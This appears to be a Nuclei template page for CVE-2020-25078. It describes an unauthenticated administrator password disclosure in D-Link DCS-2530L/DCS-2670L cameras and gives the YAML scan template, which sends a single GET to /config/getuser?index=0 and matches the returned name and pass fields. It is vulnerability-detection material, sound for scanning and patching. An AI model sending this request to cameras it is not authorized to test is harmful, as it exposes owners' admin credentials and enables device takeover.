Skip to content
Nuclei Templates

D-Link DCS-2530L/DCS-2670L - Administrator Password Disclosure

ID: CVE-2020-25078

Severity: high

Author: pikpikcu

Tags: cve,cve2020,dlink

Description

Section titled “Description”

D-Link DCS-2530L before 1.06.01 Hotfix and DCS-2670L through 2.02 devices are vulnerable to password disclosures vulnerabilities because the /config/getuser endpoint allows for remote administrator password disclosure.

YAML Source

Section titled “YAML Source”
id: CVE-2020-25078


info:
  name: D-Link DCS-2530L/DCS-2670L  - Administrator Password Disclosure
  author: pikpikcu
  severity: high
  description: D-Link DCS-2530L before 1.06.01 Hotfix and DCS-2670L through 2.02 devices are vulnerable to password disclosures vulnerabilities because the  /config/getuser endpoint allows for remote administrator password disclosure.
  impact: |
    An attacker can obtain the administrator password, potentially leading to unauthorized access and control of the camera.
  remediation: |
    Update the camera firmware to the latest version to fix the vulnerability.
  reference:
    - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10180
    - https://twitter.com/Dogonsecurity/status/1273251236167516161
    - https://nvd.nist.gov/vuln/detail/CVE-2020-25078
    - https://github.com/pen4uin/vulnerability-research-list
    - https://github.com/ArrestX/--POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-25078
    epss-score: 0.82526
    epss-percentile: 0.98323
    cpe: cpe:2.3:o:dlink:dcs-2530l_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: dlink
    product: dcs-2530l_firmware
  tags: cve,cve2020,dlink


http:
  - method: GET
    path:
      - "{{BaseURL}}/config/getuser?index=0"


    matchers-condition: and
    matchers:
      - type: word
        words:
          - "name="
          - "pass="
        condition: and


      - type: word
        part: header
        words:
          - "text/plain"


      - type: status
        status:
          - 200
# digest: 4a0a0047304502202df013c10944458fe2ebc04c81410744e82c4511538a9380a93003797dd5317f022100901e36efbefeadabb137007748b8957d5f97d0112e0644d11f185869e62a99c3:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-25078.yaml"

View on Github